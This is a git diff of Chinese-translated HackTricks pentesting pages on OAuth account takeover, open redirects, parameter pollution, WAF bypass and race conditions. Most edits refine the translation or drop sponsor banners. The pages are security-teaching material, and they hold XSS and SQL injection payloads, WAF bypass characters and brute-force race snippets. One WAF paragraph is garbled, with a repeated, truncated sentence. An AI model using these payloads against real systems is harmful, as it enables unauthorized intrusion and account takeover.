@@ -155,10 +151,10 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
 
 正如 [**在这篇文章中提到的**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts),期望接收 **token**(而不是代码)的 OAuth 流程可能会受到攻击,如果它们没有检查该 token 是否属于该应用程序。
 
-这是因为 **攻击者** 可以在自己的应用程序中创建一个 **支持 OAuth 并使用 Facebook 登录的应用程序**(例如)。然后,一旦受害者在 **攻击者的应用程序** 中使用 Facebook 登录,攻击者就可以获取 **分配给其应用程序的用户的 OAuth token,并使用它在受害者的 OAuth 应用程序中登录,使用受害者的用户 token**。
+这是因为 **攻击者** 可以在自己的应用程序中创建一个 **支持 OAuth 和使用 Facebook 登录的应用程序**(例如)。然后,一旦受害者在 **攻击者的应用程序** 中使用 Facebook 登录,攻击者就可以获取 **分配给其应用程序的用户的 OAuth token,并使用它在受害者的 OAuth 应用程序中登录,使用受害者的用户 token**。
 
 > [!CAUTION]
-> 因此,如果攻击者设法让用户访问自己的 OAuth 应用程序,他将能够在期望 token 且未检查 token 是否被授予其应用程序 ID 的应用程序中接管受害者的帐户。
+> 因此,如果攻击者设法让用户访问自己的 OAuth 应用程序,他将能够在期望 token 的应用程序中接管受害者的账户,而这些应用程序并未检查该 token 是否被授予其应用程序 ID。
 
 ### 两个链接和 cookie 
 
@@ -181,16 +177,16 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
 
 ### OAuth ROPC 流程 - 2 FA 绕过 
 
-根据 [**这篇博客文章**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96),这是一个允许通过 **用户名** 和 **密码** 登录 OAuth 的 OAuth 流程。如果在这个简单流程中返回了一个具有用户可以执行的所有操作访问权限的 **token**,那么就可以使用该 token 绕过 2FA。
+根据 [**这篇博客文章**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96),这是一个允许通过 **用户名** 和 **密码** 登录 OAuth 的 OAuth 流程。如果在这个简单流程中返回了一个具有用户可以执行的所有操作的访问权限的 **token**,那么就可以使用该 token 绕过 2FA。
 
 ### 基于开放重定向到引荐的网页重定向 ATO 
 
 这篇 [**博客文章**](https://blog.voorivex.team/oauth-non-happy-path-to-ato) 讨论了如何滥用 **开放重定向** 从 **引荐** 的值来滥用 OAuth 进行 ATO。攻击步骤如下:
 
 1. 受害者访问攻击者的网页
-2. 受害者打开恶意链接,打开者使用 `response_type=id_token,code&prompt=none` 作为附加参数启动 Google OAuth 流程,**引荐为攻击者网站**。
+2. 受害者打开恶意链接,打开者使用 `response_type=id_token,code&prompt=none` 作为附加参数启动 Google OAuth 流程,**引荐为攻击者的网站**。
 3. 在打开者中,提供者在授权受害者后,将他们发送回 `redirect_uri` 参数的值(受害者网站),并使用 30X 代码,这仍然保持攻击者网站在引荐中。
-4. 受害者 **网站根据引荐触发开放重定向**,将受害者用户重定向到攻击者网站,因为 **`respose_type`** 是 **`id_token,code`**,代码将通过 URL 的 **片段** 返回给攻击者,从而允许他通过 Google 接管受害者网站的用户帐户。
+4. 受害者 **网站根据引荐触发开放重定向**,将受害者用户重定向到攻击者网站,因为 **`respose_type`** 是 **`id_token,code`**,代码将通过 URL 的 **片段** 返回给攻击者,从而允许他通过 Google 接管受害者网站的用户账户。
 
 ### SSRFs 参数 
 
@@ -200,10 +196,10 @@ OAuth 中的动态客户端注册作为一个不太明显但关键的安全漏
 
 **关键点:**
 
-- **动态客户端注册** 通常映射到 `/register`,并接受如 `client_name`、`client_secret`、`redirect_uris` 和通过 POST 请求的 logo 或 JSON Web Key Sets (JWKs) 的 URL 等详细信息。
-- 此功能遵循 **RFC7591** 和 **OpenID Connect Registration 1.0** 中列出的规范,其中包括可能对 SSRF 易受攻击的参数。
+- **动态客户端注册** 通常映射到 `/register`,并接受如 `client_name`、`client_secret`、`redirect_uris` 和用于徽标或 JSON Web Key Sets (JWKs) 的 URL 的 POST 请求。
+- 此功能遵循 **RFC7591** 和 **OpenID Connect Registration 1.0** 中列出的规范,这些规范包括可能对 SSRF 易受攻击的参数。
 - 注册过程可能会以多种方式无意中使服务器暴露于 SSRF:
-- **`logo_uri`**:客户端应用程序 logo 的 URL,服务器可能会获取该 URL,从而触发 SSRF 或导致 XSS(如果 URL 处理不当)。
+- **`logo_uri`**:客户端应用程序徽标的 URL,服务器可能会获取该 URL,从而触发 SSRF 或导致 XSS(如果 URL 处理不当)。
 - **`jwks_uri`**:客户端的 JWK 文档的 URL,如果恶意构造,可能导致服务器向攻击者控制的服务器发出外部请求。
 - **`sector_identifier_uri`**:引用 `redirect_uris` 的 JSON 数组,服务器可能会获取该数组,从而创建 SSRF 机会。
 - **`request_uris`**:列出客户端允许的请求 URI,如果服务器在授权过程开始时获取这些 URI,则可能被利用。
@@ -215,15 +211,12 @@ OAuth 中的动态客户端注册作为一个不太明显但关键的安全漏
 
 ## OAuth 提供者竞争条件
 
-如果您正在测试的平台是 OAuth 提供者 [**请阅读此内容以测试可能的竞争条件**](race-condition.md)。
+如果您正在测试的平台是 OAuth 提供者 [**请阅读此文以测试可能的竞争条件**](race-condition.md)。
 
 ## 参考文献
 
 - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
 - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index 96713f1d1..7c45d6edf 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -2,21 +2,16 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ## Open redirect
 
-### 重定向到localhost或任意域名
+### 重定向到本地主机或任意域
 
 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}
 
-### Open Redirect to XSS
+### 开放重定向到XSS
 ```bash
 #Basic payload, javascript code is executed after "javascript:"
 javascript:alert(1)
@@ -171,15 +166,10 @@ exit;
 
 ## 资源
 
-- 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 你可以找到模糊测试列表。\\
+- 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 中可以找到模糊测试列表。\\
 - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
 - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
 
-

-
-通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md
index f647e8043..eebed7d2f 100644
--- a/src/pentesting-web/parameter-pollution.md
+++ b/src/pentesting-web/parameter-pollution.md
@@ -4,13 +4,9 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## HTTP 参数污染 (HPP) 概述
 
-HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见,但可以显著改变应用程序在服务器端的功能,并在客户端产生可观察的影响。
+HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见,但可以显著改变服务器端应用程序的功能,并在客户端产生可观察的影响。
 
 ### HTTP 参数污染 (HPP) 示例
 
@@ -22,7 +18,7 @@ HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数以
 
 - **操纵后的 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
 
-交易可能错误地计入 `accountC` 而不是 `accountA`,展示了 HPP 操纵交易或其他功能(如密码重置、双因素认证设置或 API 密钥请求)的潜力。
+交易可能错误地计入 `accountC` 而不是 `accountA`,展示了 HPP 操纵交易或其他功能(如密码重置、2FA 设置或 API 密钥请求)的潜力。
 
 #### **特定技术的参数解析**
 
@@ -31,19 +27,19 @@ HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数以
 
 ### PHP 和 HPP 利用
 
-**一次性密码 (OTP) 操作案例:**
+**OTP 操纵案例:**
 
 - **背景:** 一个需要一次性密码 (OTP) 的登录机制被利用。
-- **方法:** 通过使用 Burp Suite 等工具拦截 OTP 请求,攻击者在 HTTP 请求中复制了 `email` 参数。
+- **方法:** 通过使用 Burp Suite 等工具拦截 OTP 请求,攻击者在 HTTP 请求中重复了 `email` 参数。
 - **结果:** 本应发送到初始电子邮件的 OTP 被发送到操纵请求中指定的第二个电子邮件地址。这个缺陷允许通过绕过预期的安全措施获得未授权访问。
 
-这个场景突显了应用程序后端的一个关键疏忽,该后端处理第一个 `email` 参数以生成 OTP,但使用最后一个参数进行发送。
+这个场景突显了应用程序后端的一个关键疏漏,该后端处理第一个 `email` 参数以生成 OTP,但使用最后一个进行发送。
 
-**API 密钥操作案例:**
+**API 密钥操纵案例:**
 
 - **场景:** 一个应用程序允许用户通过个人资料设置页面更新他们的 API 密钥。
 - **攻击向量:** 攻击者发现通过向 POST 请求附加一个额外的 `api_key` 参数,可以操纵 API 密钥更新功能的结果。
-- **技术:** 利用像 Burp Suite 这样的工具,攻击者构造一个包含两个 `api_key` 参数的请求:一个合法的和一个恶意的。服务器只处理最后一个出现的参数,将 API 密钥更新为攻击者提供的值。
+- **技术:** 利用像 Burp Suite 这样的工具,攻击者构造一个请求,其中包含两个 `api_key` 参数:一个合法的和一个恶意的。服务器只处理最后一个出现的参数,将 API 密钥更新为攻击者提供的值。
 - **结果:** 攻击者控制了受害者的 API 功能,可能未经授权访问或修改私有数据。
 
 这个例子进一步强调了安全参数处理的必要性,特别是在像 API 密钥管理这样关键的功能中。
@@ -63,7 +59,7 @@ Web 技术处理重复 HTTP 参数的方式各不相同,影响其对 HPP 攻
 
 
https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg

 
-1. 忽略参数名称中的 %00 之后的内容。
+1. 忽略参数名称中的 %00 之后的任何内容。
 2. 将 name\[] 视为数组。
 3. \_GET 不代表 GET 方法。
 4. 优先考虑最后一个参数。
@@ -191,7 +187,7 @@ obj.toString() // {"test": 2}
 ```undefined
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 ```
-可以解码为多种表示,包括:
+可以解码为多种表示形式,包括:
 ```undefined
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 9.999999999999999e95
@@ -208,8 +204,5 @@ obj.toString() // {"test": 2}
 - [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
 - [https://bishopfox.com/blog/json-interoperability-vulnerabilities](https://bishopfox.com/blog/json-interoperability-vulnerabilities)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index 9f514d36f..b45aaf636 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -2,9 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
 
 ## 通过路径名操作绕过 Nginx ACL 规则 
 
@@ -20,37 +17,37 @@ location = /admin/ {
 deny all;
 }
 ```
-为了防止绕过,Nginx 在检查路径之前执行路径规范化。然而,如果后端服务器执行不同的规范化(移除 Nginx 不移除的字符),则可能会绕过此防御。
+为了防止绕过,Nginx 在检查路径之前会执行路径规范化。然而,如果后端服务器执行不同的规范化(移除 Nginx 不移除的字符),可能会绕过此防御。
 
 ### **NodeJS - Express**
 
 | Nginx 版本 | **Node.js 绕过字符** |
-| ----------- | --------------------- |
-| 1.22.0      | `\xA0`                |
-| 1.21.6      | `\xA0`                |
-| 1.20.2      | `\xA0`, `\x09`, `\x0C` |
-| 1.18.0      | `\xA0`, `\x09`, `\x0C` |
-| 1.16.1      | `\xA0`, `\x09`, `\x0C` |
+| --------- | --------------------- |
+| 1.22.0    | `\xA0`                |
+| 1.21.6    | `\xA0`                |
+| 1.20.2    | `\xA0`, `\x09`, `\x0C` |
+| 1.18.0    | `\xA0`, `\x09`, `\x0C` |
+| 1.16.1    | `\xA0`, `\x09`, `\x0C` |
 
 ### **Flask**
 
 | Nginx 版本 | **Flask 绕过字符**                                      |
-| ----------- | -------------------------------------------------------- |
-| 1.22.0      | `\x85`, `\xA0`                                         |
-| 1.21.6      | `\x85`, `\xA0`                                         |
-| 1.20.2      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
-| 1.18.0      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
-| 1.16.1      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| --------- | ------------------------------------------------------ |
+| 1.22.0    | `\x85`, `\xA0`                                       |
+| 1.21.6    | `\x85`, `\xA0`                                       |
+| 1.20.2    | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.18.0    | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.16.1    | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
 
 ### **Spring Boot**
 
 | Nginx 版本 | **Spring Boot 绕过字符** |
-| ----------- | ------------------------- |
-| 1.22.0      | `;`                       |
-| 1.21.6      | `;`                       |
-| 1.20.2      | `\x09`, `;`               |
-| 1.18.0      | `\x09`, `;`               |
-| 1.16.1      | `\x09`, `;`               |
+| --------- | ------------------------- |
+| 1.22.0    | `;`                       |
+| 1.21.6    | `;`                       |
+| 1.20.2    | `\x09`, `;`               |
+| 1.18.0    | `\x09`, `;`               |
+| 1.16.1    | `\x09`, `;`               |
 
 ### **PHP-FPM**
 
@@ -78,11 +75,11 @@ deny all;
 ### 路径混淆
 
 [**在这篇文章中**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) 解释了 ModSecurity v3(直到 3.0.12)**错误地实现了 `REQUEST_FILENAME`** 变量,该变量本应包含访问的路径(直到参数开始)。这是因为它执行了 URL 解码以获取路径。\
-因此,像 `http://example.com/foo%3f';alert(1);foo=` 这样的请求在 mod security 中将认为路径只是 `/foo`,因为 `%3f` 被转换为 `?`,结束了 URL 路径,但实际上服务器接收到的路径将是 `/foo%3f';alert(1);foo=`。
+因此,像 `http://example.com/foo%3f';alert(1);foo=` 的请求在 mod security 中将认为路径只是 `/foo`,因为 `%3f` 被转换为 `?`,结束了 URL 路径,但实际上服务器接收到的路径将是 `/foo%3f';alert(1);foo=`。
 
 变量 `REQUEST_BASENAME` 和 `PATH_INFO` 也受到此错误的影响。
 
-在 Mod Security 的版本 2 中发生了类似的情况,允许绕过一种保护,该保护阻止用户访问与备份文件相关的特定扩展名的文件(例如 `.bak`),只需通过将点 URL 编码为 `%2e` 发送请求,例如:`https://example.com/backup%2ebak`。
+在 Mod Security 的版本 2 中发生了类似的情况,允许绕过一种保护,该保护阻止用户访问与备份文件相关的特定扩展名的文件(例如 `.bak`),只需通过发送点 URL 编码为 `%2e`,例如:`https://example.com/backup%2ebak`。
 
 ## 绕过 AWS WAF ACL 
 
@@ -148,11 +145,11 @@ Connection: close\r\n
 
 正如在 [**这篇博客文章**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) 中提到的,为了绕过能够维护用户输入上下文的 WAF,我们可以利用 WAF 技术来实际规范化用户输入。
 
-例如,在文章中提到 **Akamai 对用户输入进行了 10 次 URL 解码**。因此,像 `/onfocus`,这 **可能认为是可以的,因为标签是闭合的**。然而,只要应用程序没有对输入进行 10 次 URL 解码,受害者将看到类似 `/onfocus`,这 **可能会认为是可以的,因为标签是闭合的**。然而,只要应用程序没有对输入进行 10 次 URL 解码,受害者将看到类似 ``
 - Cloudflare:`cloudflare.com/?x=`
 
-还提到,根据 **某些 WAF 如何理解用户输入的上下文**,可能会存在滥用的可能性。博客中提出的例子是 Akamai 允许在 `/*` 和 `*/` 之间放置任何内容(可能是因为这通常用作注释)。因此,像 `/*'or sleep(5)-- -*/` 这样的 SQL 注入将不会被捕获,并且是有效的,因为 `/*` 是注入的起始字符串,而 `*/` 是注释。
+还提到,根据 **某些 WAF 如何理解用户输入的上下文**,可能会存在滥用的可能。博客中提出的例子是 Akamai 允许在 `/*` 和 `*/` 之间放置任何内容(可能是因为这通常用作注释)。因此,像 `/*'or sleep(5)-- -*/` 这样的 SQL 注入将不会被捕获,并且将有效,因为 `/*` 是注入的起始字符串,而 `*/` 是注释。
 
 这些上下文问题也可以用来 **滥用其他比 WAF 预期的漏洞**(例如,这也可以用来利用 XSS)。
 
@@ -181,7 +178,7 @@ h2c-smuggling.md
 
 ### 正则表达式绕过
 
-可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效载荷。各种绕过的资源可以在 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) 和 [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) 找到。以下示例来自 [这篇文章](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)。
+可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效载荷。各种绕过的资源可以在 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) 和 [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) 找到。以下示例摘自 [这篇文章](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)。
 ```bash
  #changing the case of the tag
 < #prepending an additional "<"
@@ -206,15 +203,12 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 
 - [**nowafpls**](https://github.com/assetnote/nowafpls): Burp 插件,通过长度向请求添加垃圾数据以绕过 WAF
 
-## 参考
+## 参考文献
 
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
 - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
 - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md
index a2324174c..6b35b55ea 100644
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@@ -1,23 +1,15 @@
 # Race Condition
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
 > [!WARNING]
 > 要深入了解此技术,请查看原始报告 [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
 
-## 增强竞争条件攻击
+## Enhancing Race Condition Attacks
 
-利用竞争条件的主要障碍是确保多个请求同时处理,**处理时间差异非常小——理想情况下,少于 1 毫秒**。
+利用竞争条件的主要障碍是确保多个请求同时处理,**处理时间差异非常小——理想情况下,少于1毫秒**。
 
-在这里,您可以找到一些同步请求的技术:
+在这里可以找到一些同步请求的技术:
 
 #### HTTP/2 单包攻击与 HTTP/1.1 最后字节同步
 
@@ -31,27 +23,27 @@
 3. 禁用 TCP_NODELAY,以利用 Nagle 算法批处理最后的帧。
 4. 进行 ping 操作以预热连接。
 
-随后发送保留的帧应以单个数据包到达,可以通过 Wireshark 验证。此方法不适用于静态文件,这些文件通常不涉及 RC 攻击。
+随后发送的保留帧应以单个数据包到达,可以通过 Wireshark 验证。此方法不适用于静态文件,这些文件通常不涉及 RC 攻击。
 
-### 适应服务器架构
+### Adapting to Server Architecture
 
 了解目标的架构至关重要。前端服务器可能以不同方式路由请求,从而影响时序。通过无关请求进行预先的服务器端连接预热,可能会使请求时序正常化。
 
-#### 处理基于会话的锁定
+#### Handling Session-Based Locking
 
 像 PHP 的会话处理程序这样的框架按会话序列化请求,可能会掩盖漏洞。为每个请求使用不同的会话令牌可以规避此问题。
 
-#### 克服速率或资源限制
+#### Overcoming Rate or Resource Limits
 
 如果连接预热无效,通过大量虚假请求故意触发 Web 服务器的速率或资源限制延迟,可能会通过引发有利于竞争条件的服务器端延迟来促进单包攻击。
 
-## 攻击示例
+## Attack Examples
 
-- **Tubo Intruder - HTTP2 单包攻击 (1 个端点)**:您可以将请求发送到 **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`),您可以在请求中更改要暴力破解的 **`%s`** 的值,例如 `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`,然后从下拉菜单中选择 **`examples/race-single-packer-attack.py`**:
+- **Tubo Intruder - HTTP2 单包攻击 (1 个端点)**:您可以将请求发送到 **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`),您可以在请求中更改要暴力破解的值 **`%s`**,例如 `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`,然后从下拉菜单中选择 **`examples/race-single-packer-attack.py`**:
 
 

 
-如果您要 **发送不同的值**,您可以使用这个从剪贴板中使用字典的代码进行修改:
+如果您要**发送不同的值**,可以使用这个从剪贴板中使用字典的代码进行修改:
 ```python
 passwords = wordlists.clipboard
 for password in passwords:
@@ -227,9 +219,9 @@ response = requests.get(url, verify=False)
 ```
 ### 改进单包攻击
 
-在原始研究中解释了此攻击的限制为1,500字节。然而,在[**这篇文章**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)中,解释了如何通过使用IP层分片(将单个数据包拆分为多个IP数据包)并以不同顺序发送它们,从而扩展单包攻击的1,500字节限制到**TCP的65,535 B窗口限制**,这可以防止在所有片段到达服务器之前重新组装数据包。这项技术使研究人员能够在大约166毫秒内发送10,000个请求。 
+在原始研究中解释了此攻击的限制为1,500字节。然而,在[**这篇文章**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)中,解释了如何通过使用IP层分片(将单个数据包拆分为多个IP数据包)并以不同顺序发送它们,从而扩展单包攻击的1,500字节限制到**TCP的65,535 B窗口限制**,这使得在所有片段到达服务器之前,防止重新组装数据包。这项技术使研究人员能够在大约166毫秒内发送10,000个请求。 
 
-请注意,尽管此改进使得在需要数百/数千个数据包同时到达的RC攻击中更可靠,但它也可能存在一些软件限制。一些流行的HTTP服务器,如Apache、Nginx和Go,将`SETTINGS_MAX_CONCURRENT_STREAMS`设置为100、128和250。然而,其他如NodeJS和nghttp2则没有限制。\
+请注意,尽管此改进使得在需要数百/数千个数据包同时到达的RC攻击中更可靠,但它也可能存在一些软件限制。一些流行的HTTP服务器,如Apache、Nginx和Go,将`SETTINGS_MAX_CONCURRENT_STREAMS`设置为100、128和250。然而,像NodeJS和nghttp2等其他服务器则没有限制。\
 这基本上意味着Apache将只考虑来自单个TCP连接的100个HTTP连接(限制了此RC攻击)。
 
 您可以在repo中找到使用此技术的一些示例[https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main)。
@@ -291,19 +283,19 @@ asyncio.run(main())
 
 ### 限制溢出 / TOCTOU
 
-这是最基本的竞争条件类型,其中**漏洞**出现在**限制你可以执行某个操作次数**的地方。比如在网上商店中多次使用相同的折扣码。一个非常简单的例子可以在[**这份报告**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)或[**这个漏洞**](https://hackerone.com/reports/759247)**中找到。**
+这是最基本的竞争条件类型,其中 **漏洞** 出现在 **限制你执行某个操作次数** 的地方。比如在网上商店中多次使用相同的折扣码。一个非常简单的例子可以在 [**这份报告**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) 或 [**这个漏洞**](https://hackerone.com/reports/759247)** 中找到。**
 
-这种攻击有许多变体,包括:
+这种攻击有许多变种,包括:
 
 - 多次兑换礼品卡
 - 多次评价产品
 - 提取或转移超过账户余额的现金
-- 重复使用单个 CAPTCHA 解
+- 重复使用单个 CAPTCHA 解答
 - 绕过反暴力破解速率限制
 
 ### **隐藏子状态**
 
-利用复杂的竞争条件通常涉及利用与隐藏或**意外机器子状态**交互的短暂机会。以下是处理此问题的方法:
+利用复杂的竞争条件通常涉及利用与隐藏或 **意外机器子状态** 交互的短暂机会。以下是处理此问题的方法:
 
 1. **识别潜在的隐藏子状态**
 - 首先确定修改或与关键数据交互的端点,例如用户资料或密码重置过程。重点关注:
@@ -313,7 +305,7 @@ asyncio.run(main())
 2. **进行初步探测**
 - 使用竞争条件攻击测试识别的端点,观察是否有任何偏离预期结果的情况。意外的响应或应用程序行为的变化可能表明存在漏洞。
 3. **证明漏洞**
-- 将攻击缩小到利用漏洞所需的最少请求次数,通常仅需两个。这一步可能需要多次尝试或自动化,因为涉及精确的时机。
+- 将攻击缩小到利用漏洞所需的最少请求数量,通常仅为两个。由于涉及精确的时机,这一步可能需要多次尝试或自动化。
 
 ### 时间敏感攻击
 
@@ -333,29 +325,29 @@ asyncio.run(main())
 
 ### 支付并添加项目
 
-查看这个 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) 了解如何在商店中**支付**并**添加一个额外**的你**不需要支付的**项目。
+查看这个 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) 了解如何在商店中 **支付** 并 **添加一个额外** 的项目而 **无需支付**。
 
 ### 确认其他电子邮件
 
-这个想法是**同时验证一个电子邮件地址并将其更改为另一个**,以找出平台是否验证了更改后的新地址。
+这个想法是 **同时验证一个电子邮件地址并将其更改为另一个**,以找出平台是否验证了更改后的新地址。
 
 ### 将电子邮件更改为两个基于 Cookie 的电子邮件地址
 
-根据[**这项研究**](https://portswigger.net/research/smashing-the-state-machine),Gitlab 通过这种方式容易受到接管,因为它可能**将一个电子邮件的电子邮件验证令牌发送到另一个电子邮件**。
+根据 [**这项研究**](https://portswigger.net/research/smashing-the-state-machine),Gitlab 可能因为 **将一个电子邮件的验证令牌发送到另一个电子邮件** 而容易受到接管。
 
 **查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **进行尝试。**
 
 ### 隐藏数据库状态 / 确认绕过
 
-如果使用**两个不同的写入**在**数据库**中**添加**信息,则在**仅写入第一条数据**的短暂时间内,**确认账户的令牌**可能是**空的**。例如,在创建用户时,**用户名**和**密码**可能会被**写入**,然后**确认新创建账户的令牌**被写入。这意味着在短时间内,**确认账户的令牌为 null**。
+如果使用 **两个不同的写入** 来 **添加** **信息** 到 **数据库** 中,则在 **仅第一个数据被写入** 数据库的短暂时间内。例如,在创建用户时,**用户名** 和 **密码** 可能会被 **写入**,然后 **令牌** 用于确认新创建的账户被写入。这意味着在短时间内 **确认账户的令牌是空的**。
 
-因此,**注册一个账户并发送多个带有空令牌**(`token=`或`token[]=`或任何其他变体)以立即确认账户,可能允许确认一个你不控制电子邮件的**账户**。
